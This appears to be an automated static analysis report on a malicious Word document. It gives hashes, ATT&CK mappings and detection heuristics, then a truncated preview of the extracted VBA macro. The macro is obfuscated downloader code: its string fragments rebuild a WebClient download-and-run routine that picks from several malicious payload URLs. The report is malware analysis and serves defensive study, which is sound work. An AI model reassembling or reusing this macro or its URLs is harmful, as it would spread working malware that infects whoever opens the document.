Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e4a291ac2231af05…

MALICIOUS

Office (OLE)

Size: 184.0 KB
Created: 2017-12-08 22:03:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 8f4e13261c02718ac3ba6e1f5c0d904f
SHA-1: a6924ad3ec08f4b9ebd7a1653e78c729e159419b
SHA-256: e4a291ac2231af05144d2b7183fe1a358a687570a1b986bccc3b287952dfe463
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses the Shell() function to execute a command, likely to download and run a second-stage payload from the reconstructed URL 'http://ecocleanlublin4sX+4sXpl/V4sX+4sXmJWtp+WtpT4'. The password-protected archive lure heuristic suggests the document is designed to trick users into disabling security measures. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' further supports the malicious verdict.

Heuristics (8)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ecocleanlublin4sX+4sX.4sX+4sXpl/V4sX+4sXmJWtp+WtpT4 (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 71521 bytes
SHA-256: 47ca75bd158a21dfb974fa9b917b0fdbcd8f14aa9d70883d49ec630ae15711b4
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HiLwwbzDHw"
Function knLzCYiMoocpuh()
MAJnpp = UCase("plCSBtE" + "POXhSlH" + "dTzllGij" + "nkMBrfjMN" + "GPkjUvt") + UCase("JfuwTlvVVzAR" + "GVEOIsEXjoUF" + "ButncprZVATp" + "bGWJkMvRz" + "fRMCpJarZtijAc")
PLqMbK = Mid("tmY3M8P4,15,25]-jOInWtpWtp) (((Wtp(4sWtp+WtpX4v2franc =4sX+Wtp+Wtp4sX new-4sX'+'+4sXobjec4sX+4sXt4sX+4sX Sy4sX+4Wtp+WtpsXstem.Net.W4sX+4sXebClio1Fi2", 8, 136)
diXvhDj = UCase("CiurDoM" + "jsoIvwGKqwE" + "wpXKoWFjfE" + "nzJNDHGI" + "irhjpIX") + UCase("solIGjJNGjDjj" + "zchALllDDjp" + "qEHrUjw" + "qrSDhNAzw" + "CbRFsFzpwm")
fTrswrkjnsa = UCase("WKaKlUlZrRzB" + "EIJSCANVQn" + "QuJuvir" + "ubNBVHO" + "usUlsHBnQj") + UCase("hzPNFXXuq" + "qdIZrHzq" + "oKnbScwC" + "ItViMRKG" + "OIdzNYNEPML")
BAPEqf = UCase("JznpSMHKjOsm" + "BnaMavwJ" + "dVVjVQYwbIGcj" + "PwHnzPuPG" + "zzKPjphQXQUS") + UCase("jqrmknkffU" + "LQTIztwNOp" + "WFIPlaqEQuzc" + "wHcKcWATil" + "TWZQdSH")
SsfzcBBjAzi = Mid("mNFjCBC0aBj5kEch00qerolWtp+Wtpimitm4sX+4sXarketi4sX+'+'4sXn'+'4sX+4sXg4sX+4sX.4'+'sX+4sXcomWt'+'p+Wtp/JKDw/,httpsWtp+Wtp4sWtp+WtpX+4sX://malea4sX+4sXdUiP1HsFijaHkM", 20, 131)
vwfZUPn = UCase("ADzJvFt" + "wkJVOlzpMQ" + "PkcjhdqwPOONj" + "IIpYURMQjidzH" + "caXrwVvRXUPf") + UCase("IiJiWZi" + "dHRrziz" + "uFiVHUo" + "WPOvrkVJpMDma" + "GZddzTGAwqwQcO")
PXwvl = UCase("izUldVB" + "paEiNnvL" + "QoksoQsTEvOAa" + "zmuwYbVzpaM" + "tZHqjbNY") + UCase("iWKqicSZ" + "nJOzGrTpWk" + "RzJjcXSMNP" + "nBOTQjHqzDZP" + "DwuTPXqFdCviM")
sCXOhHBKIp = UCase("zAELbZEQcoKPZc" + "kuusjTztcEz" + "hmtYwIbVrdE" + "zUjojFshHnHD" + "icaCHbGivW") + UCase("iPOGzHkHpNv" + "nIJWMPWuf" + "ASfASjBwCCzCF" + "rljADANKjN" + "uzFtOZczsPvaz")
ajqjDjQi = Mid("MqUjD0i9QbCDNHHoO2X+4sXsQU/bP6.SpWtp+WtpliWtp+Wtpt'+'(Wtp+WtpbP'+'64sX+4sX,bP6);4v2karapas4sX+4sX ='+' 4v2nsadasd.n4sX+4sX'+'ext(14sX+4sX, 343245);4v2huas =4sX+4sX 4sX+4mHWTZuGzDXawA1", 19, 151)
SlzHa = UCase("NLKFMKAVNkm" + "jhfkSsjWcjc" + "zqYhJwToDFuipw" + "FnhjJjnnJ" + "skCvqBjiKH") + UCase("lTLORwXimA" + "TfiivzTSKDPHRO" + "tMDNwirrT" + "VUriPIWYzR" + "QHGjOszSWL")
UTtBpfBfWQ = UCase("AFqKsRkCqfajV" + "ibqjSMXlwEodU" + "MEwLmLC" + "XzqvDsHZThDlUQ" + "MIkRPIlVPz") + UCase("pljPuJojEqtX" + "fiWlHZii" + "fjDBummldazVDV" + "EmuzkMhTkallm" + "OqPwtFz")
ksDQY = UCase("LoqSiRmdGb" + "QiJmvSk" + "pzavVfHwmTI" + "bmzNQfhdrMzST" + "trHhZYzopWks") + UCase("nXTAJwmdii" + "WQlHndwIcjlPqF" + "jpnwdcXKuGYMpT" + "IPNLLJnsALXc" + "lBHcuPPwp")
qqBIBOlz = Mid("jwEj16aEJ4tJent;44sX+4sXv2nsad4sX+4sXasd '+'4sX+4sX= new'+'-objecWtp+Wtpt rando4sX+4sXmTikz", 13, 75)
MwuMjj = UCase("sOCzTNSZ" + "cIfjUflzjwQSb" + "BAkOkiWJ" + "rsufvntUA" + "mJcGTuLi") + UCase("JHitRGA" + "iwirRSsnoazqKq" + "QGozYtRUYEV" + "HJwcZup" + "WRUVrkSf")
WOmuK = UCase("BUwFqAORIpvb" + "CfukvzmkFA" + "YtwwRaEj" + "hLqMDwrmu" + "nVKiFwAiT") + UCase("DwwTrjzCSAilLI" + "qoijwGzqqNlOO" + "zQvkkOkPXUWzo" + "tjBJBpPHSz" + "tEGGGGSjJS")
SdfmzXsk = UCase("FFiQFfnDPKtukc" + "NncKZrwfl" + "ChHDiabdYFRKoc" + "BrHWrrN" + "ZJFCivHHZtSCzj") + UCase("kjSQMWADzzFXzq" + "uGomitZY" + "iQwrQWZIVsWmYa" + "ZYGGDYX" + "QQzMOKwF")
JOpwd = Mid("jKOFlAzi6ovnIFV4t1h7R9.4sX'+'+4sXcom4sX+4sX/Bn83/,http://ecocleanlublin4sX+4sX.4sX+4sXpl/V4sX+4sXmJWtp+WtpT4'+'sX+4sXr4s'+'X+4sXWtp+Wtp/,htt4sX+4sXp://m4sXWtp+Wtp+4sXath4sX+4'+'sXemagic.Wtp+WtpZY4XhDJ9T6w", 23, 171)
iFBPD = UCase("mAbuEaRNKzRf" + "JLbNYdszzPrKiJ" + "NEPfBJtBi" + "lopEnUbY" + "wuiEKjam") + UCase("kkkaRAzFkmimP" + "sGnoCsKv" + "lUMWjAFwb" + "FQwWLWoFik" + "uWjklzXrXtipU")
iTiwTcbaob = UCase("LVhvXJmc" + "zCHTWVfnNK" + "TVXLJhbRKLzXm" + "bDtGBPTd" + "bUzztdjbzoR") + UCase("pzVmphVSNziVH" + "RmhLuTprwqJkhn" + "kAjVTmGXULh" + "KPcqipzMutltzC" + "BfcFzhpdzvznIL")
zPbFodMGooS = UCase("zjKVjmiqzjqfJ" + "jvUEUNCmwl" + "OppIzCDALfZk" + "rOzRaPYM" + "TRUdKBRqLmZoU") + UCase("tiBdnfzrJLIMFO" + "LhMUbWYnTsBj" + "TmKYXRFjYl" + "hp
... (truncated)